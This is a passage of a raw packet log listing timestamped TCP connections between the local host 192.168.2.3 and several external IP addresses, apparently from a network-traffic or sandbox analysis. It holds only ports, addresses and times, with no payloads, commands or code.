Aug 23, 2021 02:08:46.480722904 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.480750084 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.480752945 CEST	49740	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:46.480773926 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.480802059 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.480803967 CEST	49740	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:46.480828047 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.480848074 CEST	49740	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:46.480851889 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.480878115 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.480904102 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.480922937 CEST	49740	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:46.480927944 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.480952978 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.480972052 CEST	49740	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:46.480976105 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.480998993 CEST	49740	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:46.481003046 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.481028080 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.481051922 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.481071949 CEST	49740	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:46.481127024 CEST	49740	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:46.512244940 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.512275934 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.512296915 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.512316942 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.512341022 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.512362003 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.512382984 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.512402058 CEST	49740	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:46.512404919 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.512428045 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.512442112 CEST	49740	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:46.512454033 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.512463093 CEST	49740	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:46.512476921 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.512496948 CEST	49740	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:46.512499094 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.512526035 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.512550116 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.512552977 CEST	49740	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:46.512628078 CEST	49740	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:46.512629986 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.512654066 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.512676954 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.512700081 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.512722015 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.512733936 CEST	49740	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:46.512741089 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.512762070 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.512785912 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.512804031 CEST	49740	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:46.512809992 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.512830973 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.512837887 CEST	49740	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:46.512851954 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.512873888 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.512895107 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.512921095 CEST	49740	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:46.512926102 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.512928009 CEST	49740	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:46.512947083 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.512985945 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.513010025 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.513045073 CEST	49740	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:46.513055086 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.513075113 CEST	49740	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:46.513075113 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.513097048 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.513118029 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.513137102 CEST	49740	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:46.513139963 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.513161898 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.513180971 CEST	49740	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:46.513185024 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.513206959 CEST	49740	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:46.513211012 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.513231039 CEST	49740	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:46.513235092 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.513257027 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.513289928 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.513312101 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.513313055 CEST	49740	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:46.513345003 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.513371944 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.513391972 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.513411045 CEST	49740	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:46.513416052 CEST	49740	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:46.513439894 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.513459921 CEST	49740	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:46.513464928 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.513513088 CEST	49740	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:46.544462919 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.544524908 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.544557095 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.544590950 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.544627905 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.544660091 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.544687986 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.544723034 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.544751883 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.544789076 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.544847965 CEST	49740	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:46.544886112 CEST	49740	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:46.544972897 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.545013905 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.545048952 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.545082092 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.545129061 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.545161009 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.545193911 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.545224905 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.545252085 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.545283079 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.545316935 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.545351028 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.545383930 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.545430899 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.545461893 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.545490026 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.545523882 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.545559883 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.545594931 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.545624971 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.545654058 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.545684099 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.545717955 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.545752048 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.545785904 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.545819044 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.545877934 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.545917034 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.545962095 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.546000004 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.546035051 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.546067953 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.546104908 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.546142101 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.546175003 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.546207905 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.546241045 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.546272039 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.546732903 CEST	49740	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:46.578701973 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.578732967 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.578749895 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.578764915 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.578917980 CEST	49740	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:46.609482050 CEST	80	49739	222.236.49.124	192.168.2.3
Aug 23, 2021 02:08:47.426580906 CEST	49741	80	192.168.2.3	222.236.49.124
Aug 23, 2021 02:08:47.717570066 CEST	80	49741	222.236.49.124	192.168.2.3
Aug 23, 2021 02:08:47.718064070 CEST	49741	80	192.168.2.3	222.236.49.124
Aug 23, 2021 02:08:47.728127003 CEST	49741	80	192.168.2.3	222.236.49.124
Aug 23, 2021 02:08:47.728152990 CEST	49741	80	192.168.2.3	222.236.49.124
Aug 23, 2021 02:08:48.020014048 CEST	80	49741	222.236.49.124	192.168.2.3
Aug 23, 2021 02:08:48.071212053 CEST	49731	8678	192.168.2.3	185.215.113.29
Aug 23, 2021 02:08:48.130705118 CEST	8678	49731	185.215.113.29	192.168.2.3
Aug 23, 2021 02:08:48.177993059 CEST	49731	8678	192.168.2.3	185.215.113.29
Aug 23, 2021 02:08:48.424077034 CEST	49731	8678	192.168.2.3	185.215.113.29
Aug 23, 2021 02:08:48.480633974 CEST	8678	49731	185.215.113.29	192.168.2.3
Aug 23, 2021 02:08:48.482013941 CEST	8678	49731	185.215.113.29	192.168.2.3
Aug 23, 2021 02:08:48.506839991 CEST	49731	8678	192.168.2.3	185.215.113.29
Aug 23, 2021 02:08:48.564224958 CEST	8678	49731	185.215.113.29	192.168.2.3
Aug 23, 2021 02:08:48.615535975 CEST	49731	8678	192.168.2.3	185.215.113.29
Aug 23, 2021 02:08:48.899586916 CEST	80	49741	222.236.49.124	192.168.2.3
Aug 23, 2021 02:08:48.899609089 CEST	80	49741	222.236.49.124	192.168.2.3
Aug 23, 2021 02:08:48.899792910 CEST	49741	80	192.168.2.3	222.236.49.124
Aug 23, 2021 02:08:48.899899960 CEST	49741	80	192.168.2.3	222.236.49.124
Aug 23, 2021 02:08:48.939466000 CEST	49742	80	192.168.2.3	218.233.73.202
Aug 23, 2021 02:08:49.189970970 CEST	80	49741	222.236.49.124	192.168.2.3
Aug 23, 2021 02:08:49.199428082 CEST	80	49742	218.233.73.202	192.168.2.3
Aug 23, 2021 02:08:49.199561119 CEST	49742	80	192.168.2.3	218.233.73.202
Aug 23, 2021 02:08:49.202387094 CEST	49742	80	192.168.2.3	218.233.73.202
Aug 23, 2021 02:08:49.202418089 CEST	49742	80	192.168.2.3	218.233.73.202
Aug 23, 2021 02:08:49.435184956 CEST	49731	8678	192.168.2.3	185.215.113.29
Aug 23, 2021 02:08:49.462945938 CEST	80	49742	218.233.73.202	192.168.2.3
Aug 23, 2021 02:08:49.510943890 CEST	8678	49731	185.215.113.29	192.168.2.3
Aug 23, 2021 02:08:49.511887074 CEST	49731	8678	192.168.2.3	185.215.113.29
Aug 23, 2021 02:08:49.569216967 CEST	8678	49731	185.215.113.29	192.168.2.3
Aug 23, 2021 02:08:49.571427107 CEST	49731	8678	192.168.2.3	185.215.113.29
Aug 23, 2021 02:08:49.629245996 CEST	8678	49731	185.215.113.29	192.168.2.3
Aug 23, 2021 02:08:49.678105116 CEST	49731	8678	192.168.2.3	185.215.113.29
Aug 23, 2021 02:08:49.962847948 CEST	49731	8678	192.168.2.3	185.215.113.29
Aug 23, 2021 02:08:50.019686937 CEST	8678	49731	185.215.113.29	192.168.2.3
Aug 23, 2021 02:08:50.019797087 CEST	8678	49731	185.215.113.29	192.168.2.3
Aug 23, 2021 02:08:50.020307064 CEST	49731	8678	192.168.2.3	185.215.113.29
Aug 23, 2021 02:08:50.100960970 CEST	49731	8678	192.168.2.3	185.215.113.29
Aug 23, 2021 02:08:50.158473969 CEST	8678	49731	185.215.113.29	192.168.2.3
Aug 23, 2021 02:08:50.170631886 CEST	49731	8678	192.168.2.3	185.215.113.29
Aug 23, 2021 02:08:50.227338076 CEST	8678	49731	185.215.113.29	192.168.2.3
Aug 23, 2021 02:08:50.271894932 CEST	49731	8678	192.168.2.3	185.215.113.29
Aug 23, 2021 02:08:50.394051075 CEST	80	49742	218.233.73.202	192.168.2.3
Aug 23, 2021 02:08:50.394073009 CEST	80	49742	218.233.73.202	192.168.2.3
Aug 23, 2021 02:08:50.394126892 CEST	49742	80	192.168.2.3	218.233.73.202
Aug 23, 2021 02:08:50.394289017 CEST	49742	80	192.168.2.3	218.233.73.202
Aug 23, 2021 02:08:50.436017036 CEST	49743	80	192.168.2.3	220.125.1.129
Aug 23, 2021 02:08:50.469621897 CEST	49731	8678	192.168.2.3	185.215.113.29
Aug 23, 2021 02:08:50.560944080 CEST	8678	49731	185.215.113.29	192.168.2.3
Aug 23, 2021 02:08:50.643630981 CEST	49731	8678	192.168.2.3	185.215.113.29
Aug 23, 2021 02:08:50.654889107 CEST	80	49742	218.233.73.202	192.168.2.3
Aug 23, 2021 02:08:50.715856075 CEST	80	49743	220.125.1.129	192.168.2.3
Aug 23, 2021 02:08:50.715959072 CEST	49743	80	192.168.2.3	220.125.1.129
Aug 23, 2021 02:08:50.716162920 CEST	49743	80	192.168.2.3	220.125.1.129
Aug 23, 2021 02:08:50.716185093 CEST	49743	80	192.168.2.3	220.125.1.129
Aug 23, 2021 02:08:50.995567083 CEST	80	49743	220.125.1.129	192.168.2.3
Aug 23, 2021 02:08:51.481131077 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:51.481209040 CEST	49740	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:51.481249094 CEST	49740	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:51.516331911 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:51.976286888 CEST	80	49743	220.125.1.129	192.168.2.3
Aug 23, 2021 02:08:51.976313114 CEST	80	49743	220.125.1.129	192.168.2.3
Aug 23, 2021 02:08:51.976442099 CEST	49743	80	192.168.2.3	220.125.1.129
Aug 23, 2021 02:08:51.980382919 CEST	49743	80	192.168.2.3	220.125.1.129
Aug 23, 2021 02:08:52.016607046 CEST	49744	80	192.168.2.3	222.236.49.124
Aug 23, 2021 02:08:52.263143063 CEST	80	49743	220.125.1.129	192.168.2.3
Aug 23, 2021 02:08:52.325023890 CEST	80	49744	222.236.49.124	192.168.2.3
Aug 23, 2021 02:08:52.326118946 CEST	49744	80	192.168.2.3	222.236.49.124
Aug 23, 2021 02:08:52.327398062 CEST	49744	80	192.168.2.3	222.236.49.124
Aug 23, 2021 02:08:52.327419043 CEST	49744	80	192.168.2.3	222.236.49.124
Aug 23, 2021 02:08:52.636673927 CEST	80	49744	222.236.49.124	192.168.2.3
Aug 23, 2021 02:08:53.574415922 CEST	80	49744	222.236.49.124	192.168.2.3
Aug 23, 2021 02:08:53.574450970 CEST	80	49744	222.236.49.124	192.168.2.3
Aug 23, 2021 02:08:53.574570894 CEST	49744	80	192.168.2.3	222.236.49.124
Aug 23, 2021 02:08:53.586978912 CEST	49744	80	192.168.2.3	222.236.49.124
Aug 23, 2021 02:08:53.680504084 CEST	49746	80	192.168.2.3	220.125.1.129
Aug 23, 2021 02:08:53.895241976 CEST	80	49744	222.236.49.124	192.168.2.3
Aug 23, 2021 02:08:53.951386929 CEST	80	49746	220.125.1.129	192.168.2.3
Aug 23, 2021 02:08:53.951581955 CEST	49746	80	192.168.2.3	220.125.1.129
Aug 23, 2021 02:08:53.951819897 CEST	49746	80	192.168.2.3	220.125.1.129
Aug 23, 2021 02:08:53.951848984 CEST	49746	80	192.168.2.3	220.125.1.129
Aug 23, 2021 02:08:54.221507072 CEST	80	49746	220.125.1.129	192.168.2.3
Aug 23, 2021 02:08:55.215859890 CEST	80	49746	220.125.1.129	192.168.2.3
Aug 23, 2021 02:08:55.215879917 CEST	80	49746	220.125.1.129	192.168.2.3
Aug 23, 2021 02:08:55.215976954 CEST	49746	80	192.168.2.3	220.125.1.129
Aug 23, 2021 02:08:55.216099024 CEST	49746	80	192.168.2.3	220.125.1.129
Aug 23, 2021 02:08:55.264445066 CEST	49747	80	192.168.2.3	220.125.1.129
Aug 23, 2021 02:08:55.486449003 CEST	80	49746	220.125.1.129	192.168.2.3
Aug 23, 2021 02:08:55.532841921 CEST	80	49747	220.125.1.129	192.168.2.3
Aug 23, 2021 02:08:55.534601927 CEST	49747	80	192.168.2.3	220.125.1.129
Aug 23, 2021 02:08:55.560694933 CEST	49747	80	192.168.2.3	220.125.1.129
Aug 23, 2021 02:08:55.560755014 CEST	49747	80	192.168.2.3	220.125.1.129
Aug 23, 2021 02:08:55.828866959 CEST	80	49747	220.125.1.129	192.168.2.3
Aug 23, 2021 02:08:56.804647923 CEST	80	49747	220.125.1.129	192.168.2.3
Aug 23, 2021 02:08:56.804722071 CEST	80	49747	220.125.1.129	192.168.2.3
Aug 23, 2021 02:08:56.804805040 CEST	49747	80	192.168.2.3	220.125.1.129
Aug 23, 2021 02:08:57.475585938 CEST	49748	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:08:57.482743979 CEST	49747	80	192.168.2.3	220.125.1.129
Aug 23, 2021 02:08:57.532850027 CEST	80	49748	185.215.113.206	192.168.2.3
Aug 23, 2021 02:08:57.532957077 CEST	49748	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:08:57.567873955 CEST	49748	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:08:57.579647064 CEST	49749	80	192.168.2.3	220.125.1.129
Aug 23, 2021 02:08:57.624602079 CEST	80	49748	185.215.113.206	192.168.2.3
Aug 23, 2021 02:08:57.742371082 CEST	80	49748	185.215.113.206	192.168.2.3
Aug 23, 2021 02:08:57.742512941 CEST	49748	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:08:57.750159979 CEST	80	49747	220.125.1.129	192.168.2.3
Aug 23, 2021 02:08:57.784096003 CEST	49750	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:08:57.784426928 CEST	49751	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:08:57.809617996 CEST	80	49750	185.206.180.136	192.168.2.3
Aug 23, 2021 02:08:57.809664011 CEST	80	49751	185.206.180.136	192.168.2.3
Aug 23, 2021 02:08:57.809735060 CEST	49750	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:08:57.809757948 CEST	49751	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:08:57.845643044 CEST	80	49749	220.125.1.129	192.168.2.3
Aug 23, 2021 02:08:57.845767975 CEST	49749	80	192.168.2.3	220.125.1.129
Aug 23, 2021 02:08:57.845848083 CEST	49749	80	192.168.2.3	220.125.1.129
Aug 23, 2021 02:08:57.845868111 CEST	49749	80	192.168.2.3	220.125.1.129
Aug 23, 2021 02:08:57.885591030 CEST	49751	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:08:57.885867119 CEST	49751	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:08:57.886466980 CEST	49751	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:08:57.887159109 CEST	49751	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:08:57.896991014 CEST	49750	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:08:57.910913944 CEST	80	49751	185.206.180.136	192.168.2.3
Aug 23, 2021 02:08:57.911056042 CEST	80	49751	185.206.180.136	192.168.2.3
Aug 23, 2021 02:08:57.911580086 CEST	80	49751	185.206.180.136	192.168.2.3
Aug 23, 2021 02:08:57.911592007 CEST	80	49751	185.206.180.136	192.168.2.3
Aug 23, 2021 02:08:57.911654949 CEST	80	49751	185.206.180.136	192.168.2.3
Aug 23, 2021 02:08:57.911727905 CEST	49751	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:08:57.911786079 CEST	49751	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:08:57.911881924 CEST	80	49751	185.206.180.136	192.168.2.3
Aug 23, 2021 02:08:57.911899090 CEST	80	49751	185.206.180.136	192.168.2.3
Aug 23, 2021 02:08:57.911914110 CEST	80	49751	185.206.180.136	192.168.2.3
Aug 23, 2021 02:08:57.911974907 CEST	49751	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:08:57.912013054 CEST	49751	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:08:57.912466049 CEST	80	49751	185.206.180.136	192.168.2.3
Aug 23, 2021 02:08:57.912497044 CEST	80	49751	185.206.180.136	192.168.2.3
Aug 23, 2021 02:08:57.912570000 CEST	49751	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:08:57.912672043 CEST	49751	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:08:57.922255993 CEST	80	49750	185.206.180.136	192.168.2.3
Aug 23, 2021 02:08:57.923019886 CEST	80	49750	185.206.180.136	192.168.2.3
Aug 23, 2021 02:08:57.923039913 CEST	80	49750	185.206.180.136	192.168.2.3
Aug 23, 2021 02:08:57.923088074 CEST	49750	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:08:57.923125982 CEST	49750	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:08:57.936940908 CEST	80	49751	185.206.180.136	192.168.2.3
Aug 23, 2021 02:08:57.936961889 CEST	80	49751	185.206.180.136	192.168.2.3
Aug 23, 2021 02:08:57.936971903 CEST	80	49751	185.206.180.136	192.168.2.3
Aug 23, 2021 02:08:57.937035084 CEST	49751	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:08:57.937083960 CEST	49751	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:08:57.937146902 CEST	80	49751	185.206.180.136	192.168.2.3
Aug 23, 2021 02:08:57.937182903 CEST	80	49751	185.206.180.136	192.168.2.3
Aug 23, 2021 02:08:57.937242985 CEST	49751	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:08:57.937308073 CEST	49751	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:08:57.937911987 CEST	80	49751	185.206.180.136	192.168.2.3
Aug 23, 2021 02:08:57.937932968 CEST	80	49751	185.206.180.136	192.168.2.3
Aug 23, 2021 02:08:57.937943935 CEST	80	49751	185.206.180.136	192.168.2.3
Aug 23, 2021 02:08:57.937952995 CEST	80	49751	185.206.180.136	192.168.2.3
Aug 23, 2021 02:08:57.938031912 CEST	49751	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:08:57.938087940 CEST	49751	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:08:57.939101934 CEST	49752	80	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:57.955212116 CEST	80	49752	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:57.955346107 CEST	49752	80	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:57.955797911 CEST	49752	80	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:57.962331057 CEST	80	49751	185.206.180.136	192.168.2.3
Aug 23, 2021 02:08:57.962353945 CEST	80	49751	185.206.180.136	192.168.2.3
Aug 23, 2021 02:08:57.962460041 CEST	80	49751	185.206.180.136	192.168.2.3
Aug 23, 2021 02:08:57.962466955 CEST	49751	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:08:57.962470055 CEST	80	49751	185.206.180.136	192.168.2.3
Aug 23, 2021 02:08:57.962480068 CEST	80	49751	185.206.180.136	192.168.2.3
Aug 23, 2021 02:08:57.963155031 CEST	80	49751	185.206.180.136	192.168.2.3
Aug 23, 2021 02:08:57.963217974 CEST	80	49751	185.206.180.136	192.168.2.3
Aug 23, 2021 02:08:57.963299990 CEST	80	49751	185.206.180.136	192.168.2.3
Aug 23, 2021 02:08:57.963341951 CEST	80	49751	185.206.180.136	192.168.2.3
Aug 23, 2021 02:08:57.963355064 CEST	80	49751	185.206.180.136	192.168.2.3
Aug 23, 2021 02:08:57.963366985 CEST	80	49751	185.206.180.136	192.168.2.3
Aug 23, 2021 02:08:57.963378906 CEST	80	49751	185.206.180.136	192.168.2.3
Aug 23, 2021 02:08:57.963422060 CEST	80	49751	185.206.180.136	192.168.2.3
Aug 23, 2021 02:08:57.963437080 CEST	80	49751	185.206.180.136	192.168.2.3
Aug 23, 2021 02:08:57.963502884 CEST	80	49751	185.206.180.136	192.168.2.3
Aug 23, 2021 02:08:57.963577986 CEST	80	49751	185.206.180.136	192.168.2.3
Aug 23, 2021 02:08:57.963591099 CEST	80	49751	185.206.180.136	192.168.2.3
Aug 23, 2021 02:08:57.963606119 CEST	80	49751	185.206.180.136	192.168.2.3
Aug 23, 2021 02:08:57.963618994 CEST	80	49751	185.206.180.136	192.168.2.3
Aug 23, 2021 02:08:57.963655949 CEST	80	49751	185.206.180.136	192.168.2.3
Aug 23, 2021 02:08:57.963702917 CEST	80	49751	185.206.180.136	192.168.2.3
